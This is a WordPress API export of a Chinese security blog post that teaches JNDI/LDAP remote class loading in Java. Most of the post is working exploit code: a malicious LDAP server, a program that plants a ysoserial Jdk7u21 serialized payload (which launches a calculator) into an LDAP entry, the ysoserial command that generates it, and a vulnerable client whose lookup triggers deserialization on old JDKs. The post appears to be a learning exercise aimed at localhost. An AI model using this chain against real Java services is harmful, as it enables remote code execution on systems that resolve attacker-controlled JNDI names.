{"id":260,"date":"2020-02-23T03:53:38","date_gmt":"2020-02-22T19:53:38","guid":{"rendered":"https:\/\/blog.73007300.xyz\/?p=260"},"modified":"2020-04-02T21:44:18","modified_gmt":"2020-04-02T13:44:18","slug":"java%e8%bf%9c%e7%a8%8b%e5%8a%a0%e8%bd%bd%e5%88%a9%e7%94%a8%e5%ad%a6%e4%b9%a0%e4%ba%8c%ef%bc%9alookup-ldap-%e5%88%a9%e7%94%a8","status":"publish","type":"post","link":"https:\/\/blog.73007300.xyz\/?p=260","title":{"rendered":"JAVA\u8fdc\u7a0b\u52a0\u8f7d\u5229\u7528\u5b66\u4e60\u4e8c\uff1alookup LDAP \u5229\u7528"},"content":{"rendered":"\n<p>\u8fd9\u8282\u5f15\u5165\u4e86 LDAP\u670d\u52a1\u3002\u901a\u8fc7JNDI (Java Naming and Directory Interface) \u6765lookup LDAP\u670d\u52a1\uff0c\u9020\u6210\u52a0\u8f7d\u8fdc\u7a0b\u7c7b\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6076\u610f\u7684LDAP\u670d\u52a1<\/h2>\n\n\n\n<p>\u521b\u5efa\u4e00\u4e2aLDAP\u670d\u52a1\uff1a<br> com.hans.ldapServer.LDAPRefServer <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>package com.hans.ldapServer;\n\n\nimport com.unboundid.ldap.listener.InMemoryDirectoryServer;\nimport com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;\nimport com.unboundid.ldap.listener.InMemoryListenerConfig;\n\nimport javax.net.ServerSocketFactory;\nimport javax.net.SocketFactory;\nimport javax.net.ssl.SSLSocketFactory;\nimport java.io.IOException;\nimport java.net.InetAddress;\n\n\n\/**\n * LDAP server implementation returning JNDI references\n *\n * @author mbechler\n *\/\npublic class LDAPRefServer {\n\n    private static final String LDAP_BASE = \"dc=example,dc=com\";\n\n\n    public static void main(String&#91;] args) throws IOException {\n        int port = 1389;\n\n        try {\n            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);\n            config.setListenerConfigs(new InMemoryListenerConfig(\n                    \"listen\", \/\/$NON-NLS-1$\n                    InetAddress.getByName(\"0.0.0.0\"), \/\/$NON-NLS-1$\n                    port,\n                    ServerSocketFactory.getDefault(),\n                    SocketFactory.getDefault(),\n                    (SSLSocketFactory) SSLSocketFactory.getDefault()));\n\n            config.setSchema(null);\n            config.setEnforceAttributeSyntaxCompliance(false);\n            config.setEnforceSingleStructuralObjectClass(false);\n\n            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);\n            ds.add(\"dn: \" + \"dc=example,dc=com\", \"objectClass: top\", \"objectclass: domain\");\n            ds.add(\"dn: \" + \"ou=employees,dc=example,dc=com\", \"objectClass: organizationalUnit\", \"objectClass: top\");\n            ds.add(\"dn: \" + \"uid=hans,ou=employees,dc=example,dc=com\", \"objectClass: ExportObject\");\n\n            System.out.println(\"Listening on 0.0.0.0:\" + port); \/\/$NON-NLS-1$\n            ds.startListening();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>\u5411LDAP\u670d\u52a1\u6ce8\u5165\u6076\u610fObject:<br>\npackage com.hans.ldapServer.LDAPServer1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>package com.hans.ldapServer;\n\nimport javax.naming.Context;\nimport javax.naming.NamingException;\nimport javax.naming.directory.BasicAttribute;\nimport javax.naming.directory.DirContext;\nimport javax.naming.directory.InitialDirContext;\nimport javax.naming.directory.ModificationItem;\nimport java.io.File;\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.util.Hashtable;\n\npublic class LDAPServer1 {\n    public static void main(String&#91;] args) throws NamingException, IOException {\n    \tSystem.out.println(\"Working Directory = \" +\n                System.getProperty(\"user.dir\"));\n        Hashtable env = new Hashtable();\n        env.put(Context.INITIAL_CONTEXT_FACTORY,\n                \"com.sun.jndi.ldap.LdapCtxFactory\");\n        env.put(Context.PROVIDER_URL, \"ldap:\/\/localhost:1389\");\n\n        DirContext ctx = new InitialDirContext(env);\n\n\t\t\/\/ \u6682\u65f6\u6ca1\u7528\u4e0a\n        String javaCodebase = \"http:\/\/127.0.0.1:8000\/\";\n\n\n        byte&#91;] javaSerializedData = Files.readAllBytes(new File(\"resources\/Jdk7u21_calc.ser\").toPath());\n\n        BasicAttribute mod1 = new\n                BasicAttribute(\"javaCodebase\", javaCodebase);\n        BasicAttribute mod2 = new\n                BasicAttribute(\"javaClassName\", \"DeserPayload\");\n        BasicAttribute mod3 = new BasicAttribute(\"javaSerializedData\",\n                javaSerializedData);\n        ModificationItem&#91;] mods = new ModificationItem&#91;3];\n        mods&#91;0] = new ModificationItem(DirContext.ADD_ATTRIBUTE, mod1);\n        mods&#91;1] = new ModificationItem(DirContext.ADD_ATTRIBUTE, mod2);\n        mods&#91;2] = new ModificationItem(DirContext.ADD_ATTRIBUTE, mod3);\n        ctx.modifyAttributes(\"uid=hans,ou=employees,dc=example,dc=com\", mods);\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>ysoserial\u751f\u6210\u4e00\u4e2apayload,\u653e\u5230resources\u76ee\u5f55\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'gnome-calculator' > Jdk7u21_calc.ser<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u53d7\u611f\u67d3\u7684 Service<\/h2>\n\n\n\n<p>com.hans.weblogicLdapExploit.Payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>package com.hans.weblogicLdapExploit;\n\nimport javax.naming.Context;\nimport javax.naming.directory.DirContext;\nimport javax.naming.directory.InitialDirContext;\n\nimport java.util.Hashtable;\n\npublic class Payload  {\n\n    public final static String JNDI_FACTORY = \"com.sun.jndi.ldap.LdapCtxFactory\";\n    public final static String url = \"ldap:\/\/localhost:1389\";\n    public static void main(String&#91;] args) throws Exception {\n    \t\/*\n\t\t    \u539f\u5b50\u540d\u662f\u4e00\u4e2a\u7b80\u5355\u3001\u57fa\u672c\u3001\u4e0d\u53ef\u5206\u5272\u7684\u7ec4\u6210\u90e8\u5206\n\t\t    \u7ed1\u5b9a\u662f\u540d\u79f0\u4e0e\u5bf9\u8c61\u7684\u5173\u8054\uff0c\u6bcf\u4e2a\u7ed1\u5b9a\u90fd\u6709\u4e00\u4e2a\u4e0d\u540c\u7684\u539f\u5b50\u540d\n\t\t    \u590d\u5408\u540d\u5305\u542b\u96f6\u4e2a\u6216\u591a\u4e2a\u539f\u5b50\u540d\uff0c\u5373\u7531\u591a\u4e2a\u7ed1\u5b9a\u7ec4\u6210\n\t\t    \u4e0a\u4e0b\u6587\u662f\u5305\u542b\u96f6\u4e2a\u6216\u591a\u4e2a\u7ed1\u5b9a\u7684\u5bf9\u8c61\uff0c\u6bcf\u4e2a\u7ed1\u5b9a\u90fd\u6709\u4e00\u4e2a\u4e0d\u540c\u7684\u539f\u5b50\u540d\n\t\t    \u547d\u540d\u7cfb\u7edf\u662f\u4e00\u7ec4\u5173\u8054\u7684\u4e0a\u4e0b\u6587\n\t\t    \u540d\u79f0\u7a7a\u95f4\u662f\u547d\u540d\u7cfb\u7edf\u4e2d\u5305\u542b\u7684\u6240\u6709\u540d\u79f0\n\t\t    \u63a2\u7d22\u540d\u79f0\u7a7a\u95f4\u7684\u8d77\u70b9\u79f0\u4e3a\u521d\u59cb\u4e0a\u4e0b\u6587\n\t\t    \u8981\u83b7\u53d6\u521d\u59cb\u4e0a\u4e0b\u6587\uff0c\u9700\u8981\u4f7f\u7528\u521d\u59cb\u4e0a\u4e0b\u6587\u5de5\u5382\n    \t * *\/\n        Hashtable&lt;String, String> env = new Hashtable&lt;String, String>();\n        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);\n        env.put(Context.PROVIDER_URL, url);\n\n        DirContext ctx = new InitialDirContext(env);\n\t    \n        Object local_obj = ctx.lookup(\"uid=hans,ou=employees,dc=example,dc=com\");\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>\u4e3a\u4e86\u89e6\u53d1\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u53d7\u611f\u67d3\u7684Service\u5fc5\u987b\u8981\u7528JDK7U21\u53ca\u5176\u4ee5\u4e0b\u7248\u672c\u7684JDK\u3002<br>\n\u9664\u4e86LDAP\uff0c\u8fd9\u4e9b\u5bf9\u8c61\u8fd8\u53ef\u4ee5\u5b58\u50a8\u5728\u4e0d\u540c\u7684\u547d\u540d\u6216\u76ee\u5f55\u670d\u52a1\u4e2d\uff0c\u4f8b\u5982\u8fdc\u7a0b\u65b9\u6cd5\u8c03\u7528\uff08RMI\uff09\uff0c\u516c\u5171\u5bf9\u8c61\u8bf7\u6c42\u4ee3\u7406\u4f53\u7cfb\u7ed3\u6784\uff08CORBA\uff09\u6216\u57df\u540d\u670d\u52a1\uff08DNS\uff09\u3002<br>\n360\u6700\u8fd1\u6b63\u597d\u6709\u7814\u7a76CORBA \uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/cert.360.cn\/report\/detail?id=d3f6666d6558f02a6204dd51cb749558\">https:\/\/cert.360.cn\/report\/detail?id=d3f6666d6558f02a6204dd51cb749558<\/a><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8fd9\u8282\u5f15\u5165\u4e86 LDAP\u670d\u52a1\u3002\u901a\u8fc7JNDI (Java Naming and Directory Interface) \u6765lookup LDAP\u670d\u52a1\uff0c\u9020\u6210\u52a0\u8f7d\u8fdc\u7a0b\u7c7b\u3002 \u6076\u610f\u7684LDAP\u670d\u52a1 \u521b\u5efa\u4e00\u4e2aLDAP\u670d\u52a1\uff1a com.hans.ldapServer.LDAPRefServer \u5411LDAP\u670d\u52a1\u6ce8\u5165\u6076\u610fObject: package com.hans.ldapServer.LDAPServer1 ysoserial\u751f\u6210\u4e00\u4e2apayload,\u653e\u5230resources\u76ee\u5f55\u4e0b\uff1a \u53d7\u611f\u67d3\u7684 Service com.hans.weblogicLdapExploit.Payload \u4e3a\u4e86\u89e6\u53d1\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u53d7\u611f\u67d3\u7684Service\u5fc5\u987b\u8981\u7528JDK7U21\u53ca\u5176\u4ee5\u4e0b\u7248\u672c\u7684JDK\u3002 \u9664\u4e86LDAP\uff0c\u8fd9\u4e9b\u5bf9\u8c61\u8fd8\u53ef\u4ee5\u5b58\u50a8\u5728\u4e0d\u540c\u7684\u547d\u540d\u6216\u76ee\u5f55\u670d\u52a1\u4e2d\uff0c\u4f8b\u5982\u8fdc\u7a0b\u65b9\u6cd5\u8c03\u7528\uff08RMI\uff09\uff0c\u516c\u5171\u5bf9\u8c61\u8bf7\u6c42\u4ee3\u7406\u4f53\u7cfb\u7ed3\u6784\uff08CORBA\uff09\u6216\u57df\u540d\u670d\u52a1\uff08DNS\uff09\u3002 360\u6700\u8fd1\u6b63\u597d\u6709\u7814\u7a76CORBA \uff1a https:\/\/cert.360.cn\/report\/detail?id=d3f6666d6558f02a6204dd51cb749558<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,2],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/260"}],"collection":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=260"}],"version-history":[{"count":2,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/260\/revisions"}],"predecessor-version":[{"id":332,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/260\/revisions\/332"}],"wp:attachment":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}